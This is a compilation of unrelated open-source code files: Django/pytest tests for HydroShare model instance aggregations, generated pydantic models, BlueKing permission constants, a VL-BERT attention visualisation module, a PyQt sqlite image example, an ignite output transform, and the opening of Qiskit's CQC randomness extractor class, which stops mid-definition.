assert resource.files.all().count() == 2
# the sqlite file added to the model instance folder should be part of a new timeseries aggregation
sqlite_res_file = ResourceFile.get(resource=resource,
file=sqlite_file_name, folder=mi_aggr_path)
assert sqlite_res_file.has_logical_file
assert TimeSeriesLogicalFile.objects.count() == 1
assert ModelInstanceLogicalFile.objects.first().files.count() == 1
# the timeseries aggregation should contain 1 file
assert TimeSeriesLogicalFile.objects.first().files.count() == 1
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_auto_ref_timeseries_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that when a ref timeseries json file is uploaded to a folder that
represents a model instance aggregation, a ref timeseries aggregation is created automatically
from that json file"""
resource, _ = composite_resource_with_mi_aggregation_folder
assert ModelInstanceLogicalFile.objects.first().files.count() == 1
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
assert RefTimeseriesLogicalFile.objects.count() == 0
# upload a ref timeseries json file to the mi_aggr_path - folder that represents the model instance aggregation
ref_timeseries_file_name = 'multi_sites_formatted_version1.0.refts.json'
ref_timeseries_file_path = 'hs_file_types/tests/{}'.format(ref_timeseries_file_name)
_add_files_to_resource(resource=resource, files_to_add=[ref_timeseries_file_path], upload_folder=mi_aggr_path)
# there should be 2 resource files
assert resource.files.all().count() == 2
# the json file added to the model instance folder should be part of a new ref timeseries aggregation
ref_ts_res_file = ResourceFile.get(resource=resource,
file=ref_timeseries_file_name, folder=mi_aggr_path)
assert ref_ts_res_file.has_logical_file
assert RefTimeseriesLogicalFile.objects.count() == 1
assert ModelInstanceLogicalFile.objects.first().files.count() == 1
# ref timeseries aggregation should contain 1 file
assert RefTimeseriesLogicalFile.objects.first().files.count() == 1
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_cannot_create_fileset_within_mi_aggregation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that one can't create a fileset aggregation inside a folder that represents a model instance aggregation"""
resource, user = composite_resource_with_mi_aggregation_folder
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
file_path = 'pytest/assets/logan.vrt'
fs_folder = 'fileset_folder'
fs_folder_path = os.path.join(mi_aggr_path, fs_folder)
ResourceFile.create_folder(resource, fs_folder)
_add_files_to_resource(resource=resource, files_to_add=[file_path], upload_folder=fs_folder_path)
# trying to set folder to fileset logical file type (aggregation) should fail
assert FileSetLogicalFile.objects.count() == 0
with pytest.raises(ValidationError):
FileSetLogicalFile.set_file_type(resource, user, folder_path=fs_folder_path)
assert FileSetLogicalFile.objects.count() == 0
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_cannot_create_mi_aggregation_within_mi_aggregation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that one can't create a model instance aggregation inside a folder that represents a model
instance aggregation"""
resource, user = composite_resource_with_mi_aggregation_folder
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
assert ModelInstanceLogicalFile.objects.count() == 1
file_path = 'pytest/assets/logan.vrt'
mi_sub_folder = 'mi_sub_folder'
mi_sub_folder_path = os.path.join(mi_aggr_path, mi_sub_folder)
ResourceFile.create_folder(resource, mi_sub_folder)
_add_files_to_resource(resource=resource, files_to_add=[file_path], upload_folder=mi_sub_folder_path)
# trying to set folder to model instance should fail
assert ModelInstanceLogicalFile.objects.count() == 1
with pytest.raises(ValidationError):
ModelInstanceLogicalFile.set_file_type(resource, user, folder_path=mi_sub_folder_path)
assert ModelInstanceLogicalFile.objects.count() == 1
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_move_single_file_aggr_into_model_instance_aggregation(composite_resource, mock_irods):
""" test that we can move a single file aggregation into a folder that represents a
model instance aggregation"""
res, user = composite_resource
file_path = 'pytest/assets/generic_file.txt'
mi_folder = 'mi_folder'
ResourceFile.create_folder(res, mi_folder)
file_to_upload = UploadedFile(file=open(file_path, 'rb'),
name=os.path.basename(file_path))
add_file_to_resource(res, file_to_upload, folder=mi_folder, check_target_folder=True)
assert res.files.count() == 1
# at this point there should not be any model instance aggregation
assert ModelInstanceLogicalFile.objects.count() == 0
# set folder to model instance aggregation type
ModelInstanceLogicalFile.set_file_type(resource=res, user=user, folder_path=mi_folder)
res_file = res.files.first()
assert res_file.has_logical_file
# file has folder
assert res_file.file_folder == mi_folder
assert ModelInstanceLogicalFile.objects.count() == 1
# create a single file aggregation
single_file_name = 'logan.vrt'
file_path = 'pytest/assets/{}'.format(single_file_name)
file_to_upload = UploadedFile(file=open(file_path, 'rb'),
name=os.path.basename(file_path))
res_file = add_file_to_resource(res, file_to_upload, check_target_folder=True)
# set file to generic logical file type (aggregation)
GenericLogicalFile.set_file_type(res, user, res_file.id)
assert GenericLogicalFile.objects.count() == 1
# moving the logan.vrt file into mi_folder should be successful
src_path = 'data/contents/{}'.format(single_file_name)
tgt_path = 'data/contents/{}/{}'.format(mi_folder, single_file_name)
move_or_rename_file_or_folder(user, res.short_id, src_path, tgt_path)
assert not res.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_update_spatial_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Here we are testing fileset level spatial coverage update using the spatial data from the
contained (children) aggregations - two child aggregations"""
resource, user = composite_resource_with_mi_aggregation_folder
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# model aggr should not have any spatial coverage
assert mi_aggr.metadata.spatial_coverage is None
# auto create a raster aggregation inside the model instance aggregation
assert GeoRasterLogicalFile.objects.count() == 0
# upload a raster file to the mi_aggr_path - folder that represents the model instance aggregation
raster_file_name = 'small_logan.tif'
raster_file_path = 'hs_file_types/tests/{}'.format(raster_file_name)
_add_files_to_resource(resource=resource, files_to_add=[raster_file_path], upload_folder=mi_aggr.folder)
# there should be three resource files ( one extra vrt file added as part of raster aggregation creation)
assert resource.files.all().count() == 3
# there should be one raster aggregation now
assert GeoRasterLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# model aggr should now have spatial coverage
assert mi_aggr.metadata.spatial_coverage is not None
assert mi_aggr.metadata.spatial_coverage.value['northlimit'] == 42.0500269597691
assert mi_aggr.metadata.spatial_coverage.value['eastlimit'] == -111.57773718106195
assert mi_aggr.metadata.spatial_coverage.value['southlimit'] == 41.98722286029891
assert mi_aggr.metadata.spatial_coverage.value['westlimit'] == -111.69756293084055
# auto create a netcdf aggregation inside the model instance aggregation
assert NetCDFLogicalFile.objects.count() == 0
# upload a netcdf file to the folder that represents the model instance aggregation
nc_file_name = "netcdf_valid.nc"
netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name)
_add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr.folder)
assert NetCDFLogicalFile.objects.count() == 1
nc_aggr = NetCDFLogicalFile.objects.first()
# netcdf aggr should have spatial coverage
assert nc_aggr.metadata.spatial_coverage is not None
# update model instance aggregation spatial coverage from the contained 2 aggregations
mi_aggr.update_spatial_coverage()
# test model instance aggregation spatial coverage data
assert mi_aggr.metadata.spatial_coverage.value['northlimit'] == 42.0500269597691
assert mi_aggr.metadata.spatial_coverage.value['eastlimit'] == -111.50594036845686
assert mi_aggr.metadata.spatial_coverage.value['southlimit'] == 41.8639080745171
assert mi_aggr.metadata.spatial_coverage.value['westlimit'] == -111.69756293084055
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_no_auto_update_spatial_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Here we are testing model instance level spatial coverage auto update does not happen when
a contained aggregation spatial coverage gets created as part of that aggregation creation
since the model instance aggregation has spatial coverage prior to the child aggregation
creation
"""
resource, user = composite_resource_with_mi_aggregation_folder
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# model aggr should not have any spatial coverage
assert mi_aggr.metadata.spatial_coverage is None
# create spatial coverage for model instance
value_dict = {'east': '56.45678', 'north': '12.6789', 'units': 'Decimal degree'}
mi_aggr.metadata.create_element('coverage', type='point', value=value_dict)
    # model aggr should now have spatial coverage
assert mi_aggr.metadata.spatial_coverage is not None
# auto create a raster aggregation inside the model instance aggregation
assert GeoRasterLogicalFile.objects.count() == 0
# upload a raster file to the mi_aggr_path - folder that represents the model instance aggregation
raster_file_name = 'small_logan.tif'
raster_file_path = 'hs_file_types/tests/{}'.format(raster_file_name)
_add_files_to_resource(resource=resource, files_to_add=[raster_file_path], upload_folder=mi_aggr.folder)
# there should be three resource files ( one extra vrt file added as part of raster aggregation creation)
assert resource.files.all().count() == 3
# there should be one raster aggregation now
assert GeoRasterLogicalFile.objects.count() == 1
gr_aggr = GeoRasterLogicalFile.objects.first()
# raster aggr should have spatial coverage
assert gr_aggr.metadata.spatial_coverage is not None
assert gr_aggr.metadata.spatial_coverage.value['northlimit'] == 42.0500269597691
assert gr_aggr.metadata.spatial_coverage.value['eastlimit'] == -111.57773718106195
assert gr_aggr.metadata.spatial_coverage.value['southlimit'] == 41.98722286029891
assert gr_aggr.metadata.spatial_coverage.value['westlimit'] == -111.69756293084055
# check model instance spatial coverage has not been updated
assert mi_aggr.metadata.spatial_coverage.value['east'] == value_dict['east']
assert mi_aggr.metadata.spatial_coverage.value['north'] == value_dict['north']
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_auto_update_temporal_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Here we are testing model instance level temporal coverage auto update when
a contained aggregation temporal coverage gets created as part of that aggregation creation
provided the model instance aggregation has no temporal coverage prior to the child aggregation
creation
"""
resource, user = composite_resource_with_mi_aggregation_folder
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# model aggr should not have any temporal coverage
assert mi_aggr.metadata.temporal_coverage is None
# auto create a netcdf aggregation inside the model instance aggregation
assert NetCDFLogicalFile.objects.count() == 0
# upload a netcdf file to the folder that represents the model instance aggregation
nc_file_name = "netcdf_valid.nc"
netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name)
_add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr.folder)
assert NetCDFLogicalFile.objects.count() == 1
nc_aggr = NetCDFLogicalFile.objects.first()
# netcdf aggr should have temporal coverage
assert nc_aggr.metadata.temporal_coverage is not None
# model aggr should now have temporal coverage
assert mi_aggr.metadata.temporal_coverage is not None
# temporal coverage of the model instance aggregation should match with that of the contained
# netcdf aggregation
for temp_date in ('start', 'end'):
assert mi_aggr.metadata.temporal_coverage.value[temp_date] == \
nc_aggr.metadata.temporal_coverage.value[temp_date]
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_no_auto_update_temporal_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Here we are testing model instance level temporal coverage auto update does not happen when
a contained aggregation temporal coverage gets created as part of that aggregation creation
since the model instance aggregation has temporal coverage prior to the child aggregation
creation
"""
resource, user = composite_resource_with_mi_aggregation_folder
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# model aggr should not have any temporal coverage
assert mi_aggr.metadata.temporal_coverage is None
# create temporal coverage for model instance
value_dict = {'name': 'Name for period coverage', 'start': '1/1/2018', 'end': '12/12/2018'}
mi_aggr.metadata.create_element('coverage', type='period', value=value_dict)
# model aggr should now have temporal coverage
assert mi_aggr.metadata.temporal_coverage is not None
# auto create a netcdf aggregation inside the model instance aggregation
assert NetCDFLogicalFile.objects.count() == 0
# upload a netcdf file to the folder that represents the model instance aggregation
nc_file_name = "netcdf_valid.nc"
netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name)
_add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr.folder)
assert NetCDFLogicalFile.objects.count() == 1
nc_aggr = NetCDFLogicalFile.objects.first()
# netcdf aggr should have temporal coverage
assert nc_aggr.metadata.temporal_coverage is not None
# temporal coverage of the model instance aggregation should NOT match with that of the contained
# netcdf aggregation
for temp_date in ('start', 'end'):
assert mi_aggr.metadata.temporal_coverage.value[temp_date] != \
nc_aggr.metadata.temporal_coverage.value[temp_date]
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_update_temporal_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Here we are testing model instance level temporal coverage can be updated by user if the contained
aggregations have temporal coverage
"""
resource, user = composite_resource_with_mi_aggregation_folder
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# model aggr should not have any temporal coverage
assert mi_aggr.metadata.temporal_coverage is None
# create temporal coverage for model instance
value_dict = {'name': 'Name for period coverage', 'start': '1/1/2018', 'end': '12/12/2018'}
mi_aggr.metadata.create_element('coverage', type='period', value=value_dict)
# model aggr should now have temporal coverage
assert mi_aggr.metadata.temporal_coverage is not None
# auto create a netcdf aggregation inside the model instance aggregation
assert NetCDFLogicalFile.objects.count() == 0
# upload a netcdf file to the folder that represents the model instance aggregation
nc_file_name = "netcdf_valid.nc"
netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name)
_add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr.folder)
assert NetCDFLogicalFile.objects.count() == 1
nc_aggr = NetCDFLogicalFile.objects.first()
# netcdf aggr should have temporal coverage
assert nc_aggr.metadata.temporal_coverage is not None
# temporal coverage of the model instance aggregation should NOT match with that of the contained
# netcdf aggregation
for temp_date in ('start', 'end'):
assert mi_aggr.metadata.temporal_coverage.value[temp_date] != \
nc_aggr.metadata.temporal_coverage.value[temp_date]
# update temporal coverage for model instance from contained aggregations
mi_aggr.update_temporal_coverage()
# temporal coverage of the model instance aggregation should now match with that of the contained
# netcdf aggregation
for temp_date in ('start', 'end'):
assert mi_aggr.metadata.temporal_coverage.value[temp_date] == \
nc_aggr.metadata.temporal_coverage.value[temp_date]
assert not resource.dangling_aggregations_exist()
def _add_files_to_resource(resource, files_to_add, upload_folder=None):
files_to_upload = []
for fl in files_to_add:
file_to_upload = UploadedFile(file=open(fl, 'rb'), name=os.path.basename(fl))
files_to_upload.append(file_to_upload)
added_resource_files = add_resource_files(resource.short_id,
*files_to_upload, folder=upload_folder)
return added_resource_files
|
tests/data/expected/parser/openapi/openapi_parser_parse_duplicate_models/output.py | stevesimmons/datamodel-code-generator | 891 | 12729266 | from __future__ import annotations
from typing import List, Optional
from pydantic import BaseModel
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List[Pet]
class Error(BaseModel):
code: int
message: str
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional[Event] = None
class Events(BaseModel):
__root__: List[Event]
class EventRoot(BaseModel):
__root__: Event
class EventObject(BaseModel):
event: Optional[Event] = None
class DuplicateObject1(BaseModel):
event: Optional[List[Event]] = None
class Event1(BaseModel):
event: Optional[Event] = None
class DuplicateObject2(BaseModel):
event: Optional[Event1] = None
class DuplicateObject3(BaseModel):
__root__: Event
|
bcs-ui/backend/container_service/projects/constants.py | laodiu/bk-bcs | 599 | 12729326 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from enum import Enum
from django.utils.translation import ugettext_lazy as _
from backend.utils.basic import ChoicesEnum
# Administrator role marker
SUPER_ROLE = 'manager'
class Policy(Enum):
    # Project management
    PROJECT = 'modify:project:btn'
    # Cluster management
    CLUSTER = 'cluster:menu'
    # Node management
    NODE = 'node:menu'
    # Application management
    APP = 'app:menu'
    # Configuration management
    CONFIGURATION = 'configuration:menu'
    # Network management
    NETWORK = 'network:menu'
    # Resource management
    RESOURCE = 'resource:menu'
    # Repository management
    REPO = 'repo:menu'
    # Repository button
REPO_MODIFY = 'modify:repo:btn'
class PolicyEffect(Enum):
    # Normal
    NORMAL = 0
    # Hidden
    HIDDEN = 1
    # Button grayed out (disabled)
DISABLED = 2
PolicyLabelOrdering = [_("容器服务"), _("仓库管理"), _("项目管理")]
PolicyOrdering = {
'jfrog': [_("prod环境拉取"), _("prod环境推送"), _("test环境拉取"), _("test环境推送"), _("dev环境拉取"), _("dev环境推送")],
'paas_backend': [_("集群管理"), _("节点管理"), _("应用管理"), _("网络管理"), _("仓库管理"), _("资源管理")],
'apigw': [],
}
class StaffInfoStatus(ChoicesEnum):
    # Under approval, default
NORMAL = 0
INCUMBENCY = 1
RESIGN = 2
TRIAL = 3
WAITING_ENTRY = 8
NOT_ENTRY = 9
_choices_labels = (
(NORMAL, _("正常")),
(INCUMBENCY, _("在职")), # 现在都返回显示正常
(RESIGN, _("已离职")),
(TRIAL, _("试用")),
(WAITING_ENTRY, _("待入职")),
(NOT_ENTRY, _("待入职")),
)
|
pretrain/modules/resnet_vlbert_for_attention_vis.py | xiling42/VL-BERT | 671 | 12729339 | <reponame>xiling42/VL-BERT<gh_stars>100-1000
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
from external.pytorch_pretrained_bert import BertTokenizer
from common.module import Module
from common.fast_rcnn import FastRCNN
from common.visual_linguistic_bert import VisualLinguisticBert
from common.utils.misc import soft_cross_entropy
BERT_WEIGHTS_NAME = 'pytorch_model.bin'
class ResNetVLBERTForAttentionVis(Module):
def __init__(self, config):
super(ResNetVLBERTForAttentionVis, self).__init__(config)
self.image_feature_extractor = FastRCNN(config,
average_pool=True,
final_dim=config.NETWORK.IMAGE_FINAL_DIM,
enable_cnn_reg_loss=False)
self.object_linguistic_embeddings = nn.Embedding(1, config.NETWORK.VLBERT.hidden_size)
if config.NETWORK.IMAGE_FEAT_PRECOMPUTED or (not config.NETWORK.MASK_RAW_PIXELS):
self.object_mask_visual_embedding = nn.Embedding(1, 2048)
if config.NETWORK.WITH_MVRC_LOSS:
self.object_mask_word_embedding = nn.Embedding(1, config.NETWORK.VLBERT.hidden_size)
self.aux_text_visual_embedding = nn.Embedding(1, config.NETWORK.VLBERT.hidden_size)
self.image_feature_bn_eval = config.NETWORK.IMAGE_FROZEN_BN
self.tokenizer = BertTokenizer.from_pretrained(config.NETWORK.BERT_MODEL_NAME)
language_pretrained_model_path = None
if config.NETWORK.BERT_PRETRAINED != '':
language_pretrained_model_path = '{}-{:04d}.model'.format(config.NETWORK.BERT_PRETRAINED,
config.NETWORK.BERT_PRETRAINED_EPOCH)
elif os.path.isdir(config.NETWORK.BERT_MODEL_NAME):
weight_path = os.path.join(config.NETWORK.BERT_MODEL_NAME, BERT_WEIGHTS_NAME)
if os.path.isfile(weight_path):
language_pretrained_model_path = weight_path
if language_pretrained_model_path is None:
print("Warning: no pretrained language model found, training from scratch!!!")
self.vlbert = VisualLinguisticBert(
config.NETWORK.VLBERT,
language_pretrained_model_path=None if config.NETWORK.VLBERT.from_scratch else language_pretrained_model_path
)
# init weights
self.init_weight()
self.fix_params()
def init_weight(self):
if self.config.NETWORK.IMAGE_FEAT_PRECOMPUTED or (not self.config.NETWORK.MASK_RAW_PIXELS):
self.object_mask_visual_embedding.weight.data.fill_(0.0)
if self.config.NETWORK.WITH_MVRC_LOSS:
self.object_mask_word_embedding.weight.data.normal_(mean=0.0, std=self.config.NETWORK.VLBERT.initializer_range)
self.aux_text_visual_embedding.weight.data.normal_(mean=0.0, std=self.config.NETWORK.VLBERT.initializer_range)
self.image_feature_extractor.init_weight()
if self.object_linguistic_embeddings is not None:
self.object_linguistic_embeddings.weight.data.normal_(mean=0.0,
std=self.config.NETWORK.VLBERT.initializer_range)
def train(self, mode=True):
super(ResNetVLBERTForAttentionVis, self).train(mode)
# turn some frozen layers to eval mode
if self.image_feature_bn_eval:
self.image_feature_extractor.bn_eval()
def fix_params(self):
pass
def _collect_obj_reps(self, span_tags, object_reps):
"""
Collect span-level object representations
:param span_tags: [batch_size, ..leading_dims.., L]
:param object_reps: [batch_size, max_num_objs_per_batch, obj_dim]
:return:
"""
span_tags_fixed = torch.clamp(span_tags, min=0) # In case there were masked values here
row_id = span_tags_fixed.new_zeros(span_tags_fixed.shape)
row_id_broadcaster = torch.arange(0, row_id.shape[0], step=1, device=row_id.device)[:, None]
        # Add extra dimensions to the row broadcaster so it matches row_id
leading_dims = len(span_tags.shape) - 2
for i in range(leading_dims):
row_id_broadcaster = row_id_broadcaster[..., None]
row_id += row_id_broadcaster
return object_reps[row_id.view(-1), span_tags_fixed.view(-1)].view(*span_tags_fixed.shape, -1)
def forward(self,
image,
boxes,
im_info,
text,
relationship_label,
mlm_labels,
mvrc_ops,
mvrc_labels,
*aux):
        # concat aux texts from different datasets
# assert len(aux) > 0 and len(aux) % 2 == 0
aux_text_list = aux[0::2]
aux_text_mlm_labels_list = aux[1::2]
num_aux_text = sum([_text.shape[0] for _text in aux_text_list])
max_aux_text_len = max([_text.shape[1] for _text in aux_text_list]) if len(aux_text_list) > 0 else 0
aux_text = text.new_zeros((num_aux_text, max_aux_text_len))
aux_text_mlm_labels = mlm_labels.new_zeros((num_aux_text, max_aux_text_len)).fill_(-1)
_cur = 0
for _text, _mlm_labels in zip(aux_text_list, aux_text_mlm_labels_list):
_num = _text.shape[0]
aux_text[_cur:(_cur + _num), :_text.shape[1]] = _text
aux_text_mlm_labels[_cur:(_cur + _num), :_text.shape[1]] = _mlm_labels
_cur += _num
###########################################
# visual feature extraction
images = image
box_mask = (boxes[:, :, 0] > -1.5)
origin_len = boxes.shape[1]
max_len = int(box_mask.sum(1).max().item())
box_mask = box_mask[:, :max_len]
boxes = boxes[:, :max_len]
mvrc_ops = mvrc_ops[:, :max_len]
mvrc_labels = mvrc_labels[:, :max_len]
if self.config.NETWORK.IMAGE_FEAT_PRECOMPUTED:
box_features = boxes[:, :, 4:]
box_features[mvrc_ops == 1] = self.object_mask_visual_embedding.weight[0]
boxes[:, :, 4:] = box_features
obj_reps = self.image_feature_extractor(images=images,
boxes=boxes,
box_mask=box_mask,
im_info=im_info,
classes=None,
segms=None,
mvrc_ops=mvrc_ops,
mask_visual_embed=self.object_mask_visual_embedding.weight[0]
if (not self.config.NETWORK.IMAGE_FEAT_PRECOMPUTED)
and (not self.config.NETWORK.MASK_RAW_PIXELS)
else None)
############################################
# prepare text
text_input_ids = text
text_tags = text.new_zeros(text.shape)
text_visual_embeddings = self._collect_obj_reps(text_tags, obj_reps['obj_reps'])
object_linguistic_embeddings = self.object_linguistic_embeddings(
boxes.new_zeros((boxes.shape[0], boxes.shape[1])).long()
)
if self.config.NETWORK.WITH_MVRC_LOSS:
object_linguistic_embeddings[mvrc_ops == 1] = self.object_mask_word_embedding.weight[0]
object_vl_embeddings = torch.cat((obj_reps['obj_reps'], object_linguistic_embeddings), -1)
# add auxiliary text
max_text_len = max(text_input_ids.shape[1], aux_text.shape[1])
text_input_ids_multi = text_input_ids.new_zeros((text_input_ids.shape[0] + aux_text.shape[0], max_text_len))
text_input_ids_multi[:text_input_ids.shape[0], :text_input_ids.shape[1]] = text_input_ids
text_input_ids_multi[text_input_ids.shape[0]:, :aux_text.shape[1]] = aux_text
text_token_type_ids_multi = text_input_ids_multi.new_zeros(text_input_ids_multi.shape)
text_mask_multi = (text_input_ids_multi > 0)
text_visual_embeddings_multi = text_visual_embeddings.new_zeros((text_input_ids.shape[0] + aux_text.shape[0],
max_text_len,
text_visual_embeddings.shape[-1]))
text_visual_embeddings_multi[:text_visual_embeddings.shape[0], :text_visual_embeddings.shape[1]] \
= text_visual_embeddings
text_visual_embeddings_multi[text_visual_embeddings.shape[0]:] = self.aux_text_visual_embedding.weight[0]
object_vl_embeddings_multi = object_vl_embeddings.new_zeros((text_input_ids.shape[0] + aux_text.shape[0],
*object_vl_embeddings.shape[1:]))
object_vl_embeddings_multi[:object_vl_embeddings.shape[0]] = object_vl_embeddings
box_mask_multi = box_mask.new_zeros((text_input_ids.shape[0] + aux_text.shape[0], *box_mask.shape[1:]))
box_mask_multi[:box_mask.shape[0]] = box_mask
###########################################
# Visual Linguistic BERT
encoder_layers, _, attention_probs = self.vlbert(text_input_ids_multi,
text_token_type_ids_multi,
text_visual_embeddings_multi,
text_mask_multi,
object_vl_embeddings_multi,
box_mask_multi,
output_all_encoded_layers=True,
output_attention_probs=True)
hidden_states = torch.stack(encoder_layers, dim=0).transpose(0, 1).contiguous()
attention_probs = torch.stack(attention_probs, dim=0).transpose(0, 1).contiguous()
return {'attention_probs': attention_probs,
'hidden_states': hidden_states}
|
sqlite3__examples/append_image/main.py | DazEB2/SimplePyScripts | 117 | 12729340 | <gh_stars>100-1000
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import sys
import sqlite3
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
if __name__ == '__main__':
con = sqlite3.connect('test.sqlite')
cur = con.cursor()
cur.execute('''
CREATE TABLE IF NOT EXISTS Images (
Data BLOB
)
''')
con.commit()
with open('capture.png', mode='rb') as f:
binary = sqlite3.Binary(f.read())
cur.execute("INSERT INTO Images(Data) VALUES (?)", (binary,))
con.commit()
app = QApplication([])
w = QWidget()
layout = QVBoxLayout()
w.setLayout(layout)
for (img_data,) in con.execute("SELECT Data from Images"):
pixmap = QPixmap()
pixmap.loadFromData(img_data)
label = QLabel()
label.setPixmap(pixmap)
layout.addWidget(label)
w.show()
sys.exit(app.exec_())
|
src/pipelinex/extras/ops/ignite/metrics/utils.py | MarchRaBBiT/pipelinex | 188 | 12729409 | <gh_stars>100-1000
import torch
from ignite.utils import to_onehot
class ClassificationOutputTransform:
def __init__(self, num_classes=None):
self._num_classes = num_classes
def __call__(self, output):
if isinstance(output, tuple):
y_pred, y = output
elif isinstance(output, dict):
y_pred = output["y_pred"]
y = output["y"]
else:
raise ValueError
if self._num_classes:
y_pred = y_pred.clamp(min=0, max=self._num_classes - 1).long()
y = y.clamp(min=0, max=self._num_classes - 1).long()
y_pred = to_onehot(y_pred, self._num_classes)
else:
y_pred = y_pred.long()
y = y.long()
return y_pred, y
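# A minimal usage sketch, assuming a dict-style engine output with integer class
# labels and num_classes known up front; the tensor values below are illustrative only.
if __name__ == "__main__":
    transform = ClassificationOutputTransform(num_classes=4)
    output = {
        "y_pred": torch.tensor([0, 2, 3]),  # predicted class indices
        "y": torch.tensor([0, 1, 3]),       # ground-truth class indices
    }
    y_pred, y = transform(output)
    print(y_pred.shape)  # torch.Size([3, 4]) - predictions one-hot encoded
    print(y)             # tensor([0, 1, 3])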
|
qiskit/providers/ibmq/random/cqcextractor.py | dowem/qiskit-ibmq-provider | 199 | 12729412 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Module for interfacing with a remote extractor."""
import logging
from typing import Optional, Callable, List
import numpy as np
from .utils import generate_wsr, bitarray_to_bytes
from .baserandomservice import BaseRandomService
from .cqcextractorjob import CQCExtractorJob
logger = logging.getLogger(__name__)
class CQCExtractor(BaseRandomService):
"""Class for interfacing with a CQC remote extractor.
There are two extractor methods - Dodis (extractor 1) and Hayashi (extractor 2).
These methods can be invoked synchronously or asynchronously.
To invoke them synchronously::
random_bits = extractor.run(*cqc_parameters)
To invoke them asynchronously::
import numpy as np
extractor1_out = extractor.run_async_ext1(*ext1_parameters).block_until_ready()
extractor2_out = extractor.run_async_ext2(
ext2_seed=extractor1_out, *ext2_parameters).block_until_ready()
random_bits = np.append(extractor1_out, extractor2_out)
Running them asynchronously takes more steps because extractor 2 uses the
output of extractor 1 as its seed, so it must wait for extractor 1 to finish first.
"""
def run( # type: ignore[override]
self,
ext1_input_num_bits: int,
ext1_output_num_bits: int,
ext1_raw_bytes: bytes,
ext1_wsr_bytes: bytes,
ext2_seed_num_bits: int,
ext2_wsr_multiplier: int,
ext2_wsr_generator: Optional[Callable] = None
) -> List[int]:
"""Process input data synchronously.
Args:
ext1_input_num_bits: Number of input bits, for extractor 1.
ext1_output_num_bits: Number of output bits, for extractor 1.
ext1_raw_bytes: Initial random numbers, in bytes, for extractor 1.
ext1_wsr_bytes: Initial WSRs, in bytes, for extractor 1.
ext2_seed_num_bits: Number of bits in the seed, for extractor 2.
ext2_wsr_multiplier: WSR multiplier, for extractor 2. The number of
bits used by extractor 2 is ext2_seed_num_bits*ext2_wsr_multiplier.
ext2_wsr_generator: WSR generator used for extractor 2. It must take the
number of bits as the input and a list of random bits (0s and 1s)
                as the output. If ``None``, :func:`generate_wsr` is used.
Returns:
            A list of extracted random bits (0s and 1s).
"""
# pylint: disable=arguments-differ
# Run ext1
output = self.run_async_ext1(ext1_input_num_bits, ext1_output_num_bits,
ext1_raw_bytes, ext1_wsr_bytes).block_until_ready()
# Run ext2 if requested.
if ext2_wsr_multiplier != 0:
ext2_out = self.run_async_ext2(
output, ext2_seed_num_bits, ext2_wsr_multiplier,
ext2_wsr_generator).block_until_ready()
output = np.append(output, ext2_out).tolist()
return output
def run_async_ext1(
self,
ext1_input_num_bits: int,
ext1_output_num_bits: int,
ext1_raw_bytes: bytes,
ext1_wsr_bytes: bytes
